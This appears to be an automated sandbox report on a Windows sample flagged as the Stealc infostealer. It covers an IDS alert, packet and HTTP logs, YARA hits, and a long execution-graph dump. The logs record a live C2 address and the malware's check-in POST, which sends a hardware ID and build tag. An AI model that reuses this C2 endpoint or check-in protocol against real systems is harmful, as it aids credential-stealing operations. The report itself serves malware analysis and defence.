Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-30T02:01:09.384981+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 30, 2024 02:01:08.423830032 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 02:01:08.428821087 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 02:01:08.428920984 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 02:01:08.429101944 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 02:01:08.433847904 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 02:01:09.151237011 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 02:01:09.151521921 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 02:01:09.154436111 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 02:01:09.159308910 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 02:01:09.384881020 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Sep 30, 2024 02:01:09.384980917 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Sep 30, 2024 02:01:12.940280914 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                      • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6704 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data

Sep 30, 2024 02:01:08.429101944 CEST | 89 | OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Sep 30, 2024 02:01:09.151237011 CEST | 203 | IN
HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 00:01:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Sep 30, 2024 02:01:09.154436111 CEST | 412 | OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 34 30 45 46 44 43 45 44 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a
Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"5E40EFDCED231817704571------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--

Sep 30, 2024 02:01:09.384881020 CEST | 210 | IN
HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 00:01:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



                      Target ID:0
                      Start time:20:01:03
                      Start date:29/09/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x1000000
                      File size:1'808'384 bytes
                      MD5 hash:E3989AF8CB5908BA300311259AF23245
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:8.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.7%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:24
execution_graph: node adjacency dump of the execution graph (about 2000 nodes, 24 limit nodes), not reproduced. API calls named at the graph nodes: GetPEB, LoadLibraryA, GetProcAddress, lstrcpy, lstrcat, lstrlen, GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, VirtualProtect, GlobalMemoryStatusEx, GetUserDefaultLangID (followed by several ExitProcess branches), GetProcessHeap, RtlAllocateHeap, GetUserNameA, GetComputerNameA, GetSystemTime, sscanf, SystemTimeToFileTime, OpenEventA, CreateEventA, CloseHandle, Sleep, GetWindowsDirectoryA, InternetOpenA and ExitProcess.
13624 10045c0 2 API calls 13623->13624 13625 100290c 13624->13625 13626 10045c0 2 API calls 13625->13626 13627 1002925 13626->13627 13628 10045c0 2 API calls 13627->13628 13629 100293e 13628->13629 13630 10045c0 2 API calls 13629->13630 13631 1002957 13630->13631 13632 10045c0 2 API calls 13631->13632 13633 1002970 13632->13633 13634 10045c0 2 API calls 13633->13634 13635 1002989 13634->13635 13636 10045c0 2 API calls 13635->13636 13637 10029a2 13636->13637 13638 10045c0 2 API calls 13637->13638 13639 10029bb 13638->13639 13640 10045c0 2 API calls 13639->13640 13641 10029d4 13640->13641 13642 10045c0 2 API calls 13641->13642 13643 10029ed 13642->13643 13644 10045c0 2 API calls 13643->13644 13645 1002a06 13644->13645 13646 10045c0 2 API calls 13645->13646 13647 1002a1f 13646->13647 13648 10045c0 2 API calls 13647->13648 13649 1002a38 13648->13649 13650 10045c0 2 API calls 13649->13650 13651 1002a51 13650->13651 13652 10045c0 2 API calls 13651->13652 13653 1002a6a 13652->13653 13654 10045c0 2 API calls 13653->13654 13655 1002a83 13654->13655 13656 10045c0 2 API calls 13655->13656 13657 1002a9c 13656->13657 13658 10045c0 2 API calls 13657->13658 13659 1002ab5 13658->13659 13660 10045c0 2 API calls 13659->13660 13661 1002ace 13660->13661 13662 10045c0 2 API calls 13661->13662 13663 1002ae7 13662->13663 13664 10045c0 2 API calls 13663->13664 13665 1002b00 13664->13665 13666 10045c0 2 API calls 13665->13666 13667 1002b19 13666->13667 13668 10045c0 2 API calls 13667->13668 13669 1002b32 13668->13669 13670 10045c0 2 API calls 13669->13670 13671 1002b4b 13670->13671 13672 10045c0 2 API calls 13671->13672 13673 1002b64 13672->13673 13674 10045c0 2 API calls 13673->13674 13675 1002b7d 13674->13675 13676 10045c0 2 API calls 13675->13676 13677 1002b96 13676->13677 13678 10045c0 2 API calls 13677->13678 13679 1002baf 13678->13679 13680 10045c0 2 API calls 13679->13680 13681 1002bc8 13680->13681 13682 10045c0 2 API calls 13681->13682 13683 1002be1 13682->13683 13684 10045c0 2 API 
calls 13683->13684 13685 1002bfa 13684->13685 13686 10045c0 2 API calls 13685->13686 13687 1002c13 13686->13687 13688 10045c0 2 API calls 13687->13688 13689 1002c2c 13688->13689 13690 10045c0 2 API calls 13689->13690 13691 1002c45 13690->13691 13692 10045c0 2 API calls 13691->13692 13693 1002c5e 13692->13693 13694 10045c0 2 API calls 13693->13694 13695 1002c77 13694->13695 13696 10045c0 2 API calls 13695->13696 13697 1002c90 13696->13697 13698 10045c0 2 API calls 13697->13698 13699 1002ca9 13698->13699 13700 10045c0 2 API calls 13699->13700 13701 1002cc2 13700->13701 13702 10045c0 2 API calls 13701->13702 13703 1002cdb 13702->13703 13704 10045c0 2 API calls 13703->13704 13705 1002cf4 13704->13705 13706 10045c0 2 API calls 13705->13706 13707 1002d0d 13706->13707 13708 10045c0 2 API calls 13707->13708 13709 1002d26 13708->13709 13710 10045c0 2 API calls 13709->13710 13711 1002d3f 13710->13711 13712 10045c0 2 API calls 13711->13712 13713 1002d58 13712->13713 13714 10045c0 2 API calls 13713->13714 13715 1002d71 13714->13715 13716 10045c0 2 API calls 13715->13716 13717 1002d8a 13716->13717 13718 10045c0 2 API calls 13717->13718 13719 1002da3 13718->13719 13720 10045c0 2 API calls 13719->13720 13721 1002dbc 13720->13721 13722 10045c0 2 API calls 13721->13722 13723 1002dd5 13722->13723 13724 10045c0 2 API calls 13723->13724 13725 1002dee 13724->13725 13726 10045c0 2 API calls 13725->13726 13727 1002e07 13726->13727 13728 10045c0 2 API calls 13727->13728 13729 1002e20 13728->13729 13730 10045c0 2 API calls 13729->13730 13731 1002e39 13730->13731 13732 10045c0 2 API calls 13731->13732 13733 1002e52 13732->13733 13734 10045c0 2 API calls 13733->13734 13735 1002e6b 13734->13735 13736 10045c0 2 API calls 13735->13736 13737 1002e84 13736->13737 13738 10045c0 2 API calls 13737->13738 13739 1002e9d 13738->13739 13740 10045c0 2 API calls 13739->13740 13741 1002eb6 13740->13741 13742 10045c0 2 API calls 13741->13742 13743 1002ecf 13742->13743 13744 10045c0 2 API calls 13743->13744 
13745 1002ee8 13744->13745 13746 10045c0 2 API calls 13745->13746 13747 1002f01 13746->13747 13748 10045c0 2 API calls 13747->13748 13749 1002f1a 13748->13749 13750 10045c0 2 API calls 13749->13750 13751 1002f33 13750->13751 13752 10045c0 2 API calls 13751->13752 13753 1002f4c 13752->13753 13754 10045c0 2 API calls 13753->13754 13755 1002f65 13754->13755 13756 10045c0 2 API calls 13755->13756 13757 1002f7e 13756->13757 13758 10045c0 2 API calls 13757->13758 13759 1002f97 13758->13759 13760 10045c0 2 API calls 13759->13760 13761 1002fb0 13760->13761 13762 10045c0 2 API calls 13761->13762 13763 1002fc9 13762->13763 13764 10045c0 2 API calls 13763->13764 13765 1002fe2 13764->13765 13766 10045c0 2 API calls 13765->13766 13767 1002ffb 13766->13767 13768 10045c0 2 API calls 13767->13768 13769 1003014 13768->13769 13770 10045c0 2 API calls 13769->13770 13771 100302d 13770->13771 13772 10045c0 2 API calls 13771->13772 13773 1003046 13772->13773 13774 10045c0 2 API calls 13773->13774 13775 100305f 13774->13775 13776 10045c0 2 API calls 13775->13776 13777 1003078 13776->13777 13778 10045c0 2 API calls 13777->13778 13779 1003091 13778->13779 13780 10045c0 2 API calls 13779->13780 13781 10030aa 13780->13781 13782 10045c0 2 API calls 13781->13782 13783 10030c3 13782->13783 13784 10045c0 2 API calls 13783->13784 13785 10030dc 13784->13785 13786 10045c0 2 API calls 13785->13786 13787 10030f5 13786->13787 13788 10045c0 2 API calls 13787->13788 13789 100310e 13788->13789 13790 10045c0 2 API calls 13789->13790 13791 1003127 13790->13791 13792 10045c0 2 API calls 13791->13792 13793 1003140 13792->13793 13794 10045c0 2 API calls 13793->13794 13795 1003159 13794->13795 13796 10045c0 2 API calls 13795->13796 13797 1003172 13796->13797 13798 10045c0 2 API calls 13797->13798 13799 100318b 13798->13799 13800 10045c0 2 API calls 13799->13800 13801 10031a4 13800->13801 13802 10045c0 2 API calls 13801->13802 13803 10031bd 13802->13803 13804 10045c0 2 API calls 13803->13804 13805 10031d6 
13804->13805 13806 10045c0 2 API calls 13805->13806 13807 10031ef 13806->13807 13808 10045c0 2 API calls 13807->13808 13809 1003208 13808->13809 13810 10045c0 2 API calls 13809->13810 13811 1003221 13810->13811 13812 10045c0 2 API calls 13811->13812 13813 100323a 13812->13813 13814 10045c0 2 API calls 13813->13814 13815 1003253 13814->13815 13816 10045c0 2 API calls 13815->13816 13817 100326c 13816->13817 13818 10045c0 2 API calls 13817->13818 13819 1003285 13818->13819 13820 10045c0 2 API calls 13819->13820 13821 100329e 13820->13821 13822 10045c0 2 API calls 13821->13822 13823 10032b7 13822->13823 13824 10045c0 2 API calls 13823->13824 13825 10032d0 13824->13825 13826 10045c0 2 API calls 13825->13826 13827 10032e9 13826->13827 13828 10045c0 2 API calls 13827->13828 13829 1003302 13828->13829 13830 10045c0 2 API calls 13829->13830 13831 100331b 13830->13831 13832 10045c0 2 API calls 13831->13832 13833 1003334 13832->13833 13834 10045c0 2 API calls 13833->13834 13835 100334d 13834->13835 13836 10045c0 2 API calls 13835->13836 13837 1003366 13836->13837 13838 10045c0 2 API calls 13837->13838 13839 100337f 13838->13839 13840 10045c0 2 API calls 13839->13840 13841 1003398 13840->13841 13842 10045c0 2 API calls 13841->13842 13843 10033b1 13842->13843 13844 10045c0 2 API calls 13843->13844 13845 10033ca 13844->13845 13846 10045c0 2 API calls 13845->13846 13847 10033e3 13846->13847 13848 10045c0 2 API calls 13847->13848 13849 10033fc 13848->13849 13850 10045c0 2 API calls 13849->13850 13851 1003415 13850->13851 13852 10045c0 2 API calls 13851->13852 13853 100342e 13852->13853 13854 10045c0 2 API calls 13853->13854 13855 1003447 13854->13855 13856 10045c0 2 API calls 13855->13856 13857 1003460 13856->13857 13858 10045c0 2 API calls 13857->13858 13859 1003479 13858->13859 13860 10045c0 2 API calls 13859->13860 13861 1003492 13860->13861 13862 10045c0 2 API calls 13861->13862 13863 10034ab 13862->13863 13864 10045c0 2 API calls 13863->13864 13865 10034c4 13864->13865 13866 
10045c0 2 API calls 13865->13866 13867 10034dd 13866->13867 13868 10045c0 2 API calls 13867->13868 13869 10034f6 13868->13869 13870 10045c0 2 API calls 13869->13870 13871 100350f 13870->13871 13872 10045c0 2 API calls 13871->13872 13873 1003528 13872->13873 13874 10045c0 2 API calls 13873->13874 13875 1003541 13874->13875 13876 10045c0 2 API calls 13875->13876 13877 100355a 13876->13877 13878 10045c0 2 API calls 13877->13878 13879 1003573 13878->13879 13880 10045c0 2 API calls 13879->13880 13881 100358c 13880->13881 13882 10045c0 2 API calls 13881->13882 13883 10035a5 13882->13883 13884 10045c0 2 API calls 13883->13884 13885 10035be 13884->13885 13886 10045c0 2 API calls 13885->13886 13887 10035d7 13886->13887 13888 10045c0 2 API calls 13887->13888 13889 10035f0 13888->13889 13890 10045c0 2 API calls 13889->13890 13891 1003609 13890->13891 13892 10045c0 2 API calls 13891->13892 13893 1003622 13892->13893 13894 10045c0 2 API calls 13893->13894 13895 100363b 13894->13895 13896 10045c0 2 API calls 13895->13896 13897 1003654 13896->13897 13898 10045c0 2 API calls 13897->13898 13899 100366d 13898->13899 13900 10045c0 2 API calls 13899->13900 13901 1003686 13900->13901 13902 10045c0 2 API calls 13901->13902 13903 100369f 13902->13903 13904 10045c0 2 API calls 13903->13904 13905 10036b8 13904->13905 13906 10045c0 2 API calls 13905->13906 13907 10036d1 13906->13907 13908 10045c0 2 API calls 13907->13908 13909 10036ea 13908->13909 13910 10045c0 2 API calls 13909->13910 13911 1003703 13910->13911 13912 10045c0 2 API calls 13911->13912 13913 100371c 13912->13913 13914 10045c0 2 API calls 13913->13914 13915 1003735 13914->13915 13916 10045c0 2 API calls 13915->13916 13917 100374e 13916->13917 13918 10045c0 2 API calls 13917->13918 13919 1003767 13918->13919 13920 10045c0 2 API calls 13919->13920 13921 1003780 13920->13921 13922 10045c0 2 API calls 13921->13922 13923 1003799 13922->13923 13924 10045c0 2 API calls 13923->13924 13925 10037b2 13924->13925 13926 10045c0 2 API calls 
13925->13926 13927 10037cb 13926->13927 13928 10045c0 2 API calls 13927->13928 13929 10037e4 13928->13929 13930 10045c0 2 API calls 13929->13930 13931 10037fd 13930->13931 13932 10045c0 2 API calls 13931->13932 13933 1003816 13932->13933 13934 10045c0 2 API calls 13933->13934 13935 100382f 13934->13935 13936 10045c0 2 API calls 13935->13936 13937 1003848 13936->13937 13938 10045c0 2 API calls 13937->13938 13939 1003861 13938->13939 13940 10045c0 2 API calls 13939->13940 13941 100387a 13940->13941 13942 10045c0 2 API calls 13941->13942 13943 1003893 13942->13943 13944 10045c0 2 API calls 13943->13944 13945 10038ac 13944->13945 13946 10045c0 2 API calls 13945->13946 13947 10038c5 13946->13947 13948 10045c0 2 API calls 13947->13948 13949 10038de 13948->13949 13950 10045c0 2 API calls 13949->13950 13951 10038f7 13950->13951 13952 10045c0 2 API calls 13951->13952 13953 1003910 13952->13953 13954 10045c0 2 API calls 13953->13954 13955 1003929 13954->13955 13956 10045c0 2 API calls 13955->13956 13957 1003942 13956->13957 13958 10045c0 2 API calls 13957->13958 13959 100395b 13958->13959 13960 10045c0 2 API calls 13959->13960 13961 1003974 13960->13961 13962 10045c0 2 API calls 13961->13962 13963 100398d 13962->13963 13964 10045c0 2 API calls 13963->13964 13965 10039a6 13964->13965 13966 10045c0 2 API calls 13965->13966 13967 10039bf 13966->13967 13968 10045c0 2 API calls 13967->13968 13969 10039d8 13968->13969 13970 10045c0 2 API calls 13969->13970 13971 10039f1 13970->13971 13972 10045c0 2 API calls 13971->13972 13973 1003a0a 13972->13973 13974 10045c0 2 API calls 13973->13974 13975 1003a23 13974->13975 13976 10045c0 2 API calls 13975->13976 13977 1003a3c 13976->13977 13978 10045c0 2 API calls 13977->13978 13979 1003a55 13978->13979 13980 10045c0 2 API calls 13979->13980 13981 1003a6e 13980->13981 13982 10045c0 2 API calls 13981->13982 13983 1003a87 13982->13983 13984 10045c0 2 API calls 13983->13984 13985 1003aa0 13984->13985 13986 10045c0 2 API calls 13985->13986 13987 
1003ab9 13986->13987 13988 10045c0 2 API calls 13987->13988 13989 1003ad2 13988->13989 13990 10045c0 2 API calls 13989->13990 13991 1003aeb 13990->13991 13992 10045c0 2 API calls 13991->13992 13993 1003b04 13992->13993 13994 10045c0 2 API calls 13993->13994 13995 1003b1d 13994->13995 13996 10045c0 2 API calls 13995->13996 13997 1003b36 13996->13997 13998 10045c0 2 API calls 13997->13998 13999 1003b4f 13998->13999 14000 10045c0 2 API calls 13999->14000 14001 1003b68 14000->14001 14002 10045c0 2 API calls 14001->14002 14003 1003b81 14002->14003 14004 10045c0 2 API calls 14003->14004 14005 1003b9a 14004->14005 14006 10045c0 2 API calls 14005->14006 14007 1003bb3 14006->14007 14008 10045c0 2 API calls 14007->14008 14009 1003bcc 14008->14009 14010 10045c0 2 API calls 14009->14010 14011 1003be5 14010->14011 14012 10045c0 2 API calls 14011->14012 14013 1003bfe 14012->14013 14014 10045c0 2 API calls 14013->14014 14015 1003c17 14014->14015 14016 10045c0 2 API calls 14015->14016 14017 1003c30 14016->14017 14018 10045c0 2 API calls 14017->14018 14019 1003c49 14018->14019 14020 10045c0 2 API calls 14019->14020 14021 1003c62 14020->14021 14022 10045c0 2 API calls 14021->14022 14023 1003c7b 14022->14023 14024 10045c0 2 API calls 14023->14024 14025 1003c94 14024->14025 14026 10045c0 2 API calls 14025->14026 14027 1003cad 14026->14027 14028 10045c0 2 API calls 14027->14028 14029 1003cc6 14028->14029 14030 10045c0 2 API calls 14029->14030 14031 1003cdf 14030->14031 14032 10045c0 2 API calls 14031->14032 14033 1003cf8 14032->14033 14034 10045c0 2 API calls 14033->14034 14035 1003d11 14034->14035 14036 10045c0 2 API calls 14035->14036 14037 1003d2a 14036->14037 14038 10045c0 2 API calls 14037->14038 14039 1003d43 14038->14039 14040 10045c0 2 API calls 14039->14040 14041 1003d5c 14040->14041 14042 10045c0 2 API calls 14041->14042 14043 1003d75 14042->14043 14044 10045c0 2 API calls 14043->14044 14045 1003d8e 14044->14045 14046 10045c0 2 API calls 14045->14046 14047 1003da7 
14046->14047 14048 10045c0 2 API calls 14047->14048 14049 1003dc0 14048->14049 14050 10045c0 2 API calls 14049->14050 14051 1003dd9 14050->14051 14052 10045c0 2 API calls 14051->14052 14053 1003df2 14052->14053 14054 10045c0 2 API calls 14053->14054 14055 1003e0b 14054->14055 14056 10045c0 2 API calls 14055->14056 14057 1003e24 14056->14057 14058 10045c0 2 API calls 14057->14058 14059 1003e3d 14058->14059 14060 10045c0 2 API calls 14059->14060 14061 1003e56 14060->14061 14062 10045c0 2 API calls 14061->14062 14063 1003e6f 14062->14063 14064 10045c0 2 API calls 14063->14064 14065 1003e88 14064->14065 14066 10045c0 2 API calls 14065->14066 14067 1003ea1 14066->14067 14068 10045c0 2 API calls 14067->14068 14069 1003eba 14068->14069 14070 10045c0 2 API calls 14069->14070 14071 1003ed3 14070->14071 14072 10045c0 2 API calls 14071->14072 14073 1003eec 14072->14073 14074 10045c0 2 API calls 14073->14074 14075 1003f05 14074->14075 14076 10045c0 2 API calls 14075->14076 14077 1003f1e 14076->14077 14078 10045c0 2 API calls 14077->14078 14079 1003f37 14078->14079 14080 10045c0 2 API calls 14079->14080 14081 1003f50 14080->14081 14082 10045c0 2 API calls 14081->14082 14083 1003f69 14082->14083 14084 10045c0 2 API calls 14083->14084 14085 1003f82 14084->14085 14086 10045c0 2 API calls 14085->14086 14087 1003f9b 14086->14087 14088 10045c0 2 API calls 14087->14088 14089 1003fb4 14088->14089 14090 10045c0 2 API calls 14089->14090 14091 1003fcd 14090->14091 14092 10045c0 2 API calls 14091->14092 14093 1003fe6 14092->14093 14094 10045c0 2 API calls 14093->14094 14095 1003fff 14094->14095 14096 10045c0 2 API calls 14095->14096 14097 1004018 14096->14097 14098 10045c0 2 API calls 14097->14098 14099 1004031 14098->14099 14100 10045c0 2 API calls 14099->14100 14101 100404a 14100->14101 14102 10045c0 2 API calls 14101->14102 14103 1004063 14102->14103 14104 10045c0 2 API calls 14103->14104 14105 100407c 14104->14105 14106 10045c0 2 API calls 14105->14106 14107 1004095 14106->14107 14108 
10045c0 2 API calls 14107->14108 14109 10040ae 14108->14109 14110 10045c0 2 API calls 14109->14110 14111 10040c7 14110->14111 14112 10045c0 2 API calls 14111->14112 14113 10040e0 14112->14113 14114 10045c0 2 API calls 14113->14114 14115 10040f9 14114->14115 14116 10045c0 2 API calls 14115->14116 14117 1004112 14116->14117 14118 10045c0 2 API calls 14117->14118 14119 100412b 14118->14119 14120 10045c0 2 API calls 14119->14120 14121 1004144 14120->14121 14122 10045c0 2 API calls 14121->14122 14123 100415d 14122->14123 14124 10045c0 2 API calls 14123->14124 14125 1004176 14124->14125 14126 10045c0 2 API calls 14125->14126 14127 100418f 14126->14127 14128 10045c0 2 API calls 14127->14128 14129 10041a8 14128->14129 14130 10045c0 2 API calls 14129->14130 14131 10041c1 14130->14131 14132 10045c0 2 API calls 14131->14132 14133 10041da 14132->14133 14134 10045c0 2 API calls 14133->14134 14135 10041f3 14134->14135 14136 10045c0 2 API calls 14135->14136 14137 100420c 14136->14137 14138 10045c0 2 API calls 14137->14138 14139 1004225 14138->14139 14140 10045c0 2 API calls 14139->14140 14141 100423e 14140->14141 14142 10045c0 2 API calls 14141->14142 14143 1004257 14142->14143 14144 10045c0 2 API calls 14143->14144 14145 1004270 14144->14145 14146 10045c0 2 API calls 14145->14146 14147 1004289 14146->14147 14148 10045c0 2 API calls 14147->14148 14149 10042a2 14148->14149 14150 10045c0 2 API calls 14149->14150 14151 10042bb 14150->14151 14152 10045c0 2 API calls 14151->14152 14153 10042d4 14152->14153 14154 10045c0 2 API calls 14153->14154 14155 10042ed 14154->14155 14156 10045c0 2 API calls 14155->14156 14157 1004306 14156->14157 14158 10045c0 2 API calls 14157->14158 14159 100431f 14158->14159 14160 10045c0 2 API calls 14159->14160 14161 1004338 14160->14161 14162 10045c0 2 API calls 14161->14162 14163 1004351 14162->14163 14164 10045c0 2 API calls 14163->14164 14165 100436a 14164->14165 14166 10045c0 2 API calls 14165->14166 14167 1004383 14166->14167 14168 10045c0 2 API calls 
14167->14168 14169 100439c 14168->14169 14170 10045c0 2 API calls 14169->14170 14171 10043b5 14170->14171 14172 10045c0 2 API calls 14171->14172 14173 10043ce 14172->14173 14174 10045c0 2 API calls 14173->14174 14175 10043e7 14174->14175 14176 10045c0 2 API calls 14175->14176 14177 1004400 14176->14177 14178 10045c0 2 API calls 14177->14178 14179 1004419 14178->14179 14180 10045c0 2 API calls 14179->14180 14181 1004432 14180->14181 14182 10045c0 2 API calls 14181->14182 14183 100444b 14182->14183 14184 10045c0 2 API calls 14183->14184 14185 1004464 14184->14185 14186 10045c0 2 API calls 14185->14186 14187 100447d 14186->14187 14188 10045c0 2 API calls 14187->14188 14189 1004496 14188->14189 14190 10045c0 2 API calls 14189->14190 14191 10044af 14190->14191 14192 10045c0 2 API calls 14191->14192 14193 10044c8 14192->14193 14194 10045c0 2 API calls 14193->14194 14195 10044e1 14194->14195 14196 10045c0 2 API calls 14195->14196 14197 10044fa 14196->14197 14198 10045c0 2 API calls 14197->14198 14199 1004513 14198->14199 14200 10045c0 2 API calls 14199->14200 14201 100452c 14200->14201 14202 10045c0 2 API calls 14201->14202 14203 1004545 14202->14203 14204 10045c0 2 API calls 14203->14204 14205 100455e 14204->14205 14206 10045c0 2 API calls 14205->14206 14207 1004577 14206->14207 14208 10045c0 2 API calls 14207->14208 14209 1004590 14208->14209 14210 10045c0 2 API calls 14209->14210 14211 10045a9 14210->14211 14212 1019c10 14211->14212 14213 1019c20 43 API calls 14212->14213 14214 101a036 8 API calls 14212->14214 14213->14214 14215 101a146 14214->14215 14216 101a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14214->14216 14217 101a153 8 API calls 14215->14217 14218 101a216 14215->14218 14216->14215 14217->14218 14219 101a298 14218->14219 14220 101a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14218->14220 14221 101a2a5 6 API calls 14219->14221 14222 101a337 14219->14222 14220->14219 14221->14222 14223 
101a344 9 API calls 14222->14223 14224 101a41f 14222->14224 14223->14224 14225 101a4a2 14224->14225 14226 101a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14224->14226 14227 101a4ab GetProcAddress GetProcAddress 14225->14227 14228 101a4dc 14225->14228 14226->14225 14227->14228 14229 101a515 14228->14229 14230 101a4e5 GetProcAddress GetProcAddress 14228->14230 14231 101a612 14229->14231 14232 101a522 10 API calls 14229->14232 14230->14229 14233 101a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14231->14233 14234 101a67d 14231->14234 14232->14231 14233->14234 14235 101a686 GetProcAddress 14234->14235 14236 101a69e 14234->14236 14235->14236 14237 101a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14236->14237 14238 1015ca3 14236->14238 14237->14238 14239 1001590 14238->14239 15360 1001670 14239->15360 14242 101a7a0 lstrcpy 14243 10015b5 14242->14243 14244 101a7a0 lstrcpy 14243->14244 14245 10015c7 14244->14245 14246 101a7a0 lstrcpy 14245->14246 14247 10015d9 14246->14247 14248 101a7a0 lstrcpy 14247->14248 14249 1001663 14248->14249 14250 1015510 14249->14250 14251 1015521 14250->14251 14252 101a820 2 API calls 14251->14252 14253 101552e 14252->14253 14254 101a820 2 API calls 14253->14254 14255 101553b 14254->14255 14256 101a820 2 API calls 14255->14256 14257 1015548 14256->14257 14258 101a740 lstrcpy 14257->14258 14259 1015555 14258->14259 14260 101a740 lstrcpy 14259->14260 14261 1015562 14260->14261 14262 101a740 lstrcpy 14261->14262 14263 101556f 14262->14263 14264 101a740 lstrcpy 14263->14264 14304 101557c 14264->14304 14265 101a820 lstrlen lstrcpy 14265->14304 14266 101a8a0 lstrcpy 14266->14304 14267 1015643 StrCmpCA 14267->14304 14268 10156a0 StrCmpCA 14269 10157dc 14268->14269 14268->14304 14270 101a8a0 lstrcpy 14269->14270 14271 10157e8 14270->14271 14272 101a820 2 API calls 14271->14272 14274 10157f6 14272->14274 14273 10151f0 20 API calls 14273->14304 14276 101a820 2 API calls 14274->14276 
14275 1015856 StrCmpCA 14277 1015991 14275->14277 14275->14304 14279 1015805 14276->14279 14278 101a8a0 lstrcpy 14277->14278 14280 101599d 14278->14280 14281 1001670 lstrcpy 14279->14281 14282 101a820 2 API calls 14280->14282 14301 1015811 14281->14301 14285 10159ab 14282->14285 14283 101a740 lstrcpy 14283->14304 14284 10152c0 25 API calls 14284->14304 14289 101a820 2 API calls 14285->14289 14286 1015a0b StrCmpCA 14287 1015a16 Sleep 14286->14287 14288 1015a28 14286->14288 14287->14304 14290 101a8a0 lstrcpy 14288->14290 14291 10159ba 14289->14291 14292 1015a34 14290->14292 14293 1001670 lstrcpy 14291->14293 14294 101a820 2 API calls 14292->14294 14293->14301 14295 1015a43 14294->14295 14296 101a820 2 API calls 14295->14296 14297 1015a52 14296->14297 14299 1001670 lstrcpy 14297->14299 14298 101578a StrCmpCA 14298->14304 14299->14301 14300 101a7a0 lstrcpy 14300->14304 14301->13357 14302 101593f StrCmpCA 14302->14304 14303 1001590 lstrcpy 14303->14304 14304->14265 14304->14266 14304->14267 14304->14268 14304->14273 14304->14275 14304->14283 14304->14284 14304->14286 14304->14298 14304->14300 14304->14302 14304->14303 14306 1017553 GetVolumeInformationA 14305->14306 14307 101754c 14305->14307 14308 1017591 14306->14308 14307->14306 14309 10175fc GetProcessHeap RtlAllocateHeap 14308->14309 14310 1017619 14309->14310 14311 1017628 wsprintfA 14309->14311 14312 101a740 lstrcpy 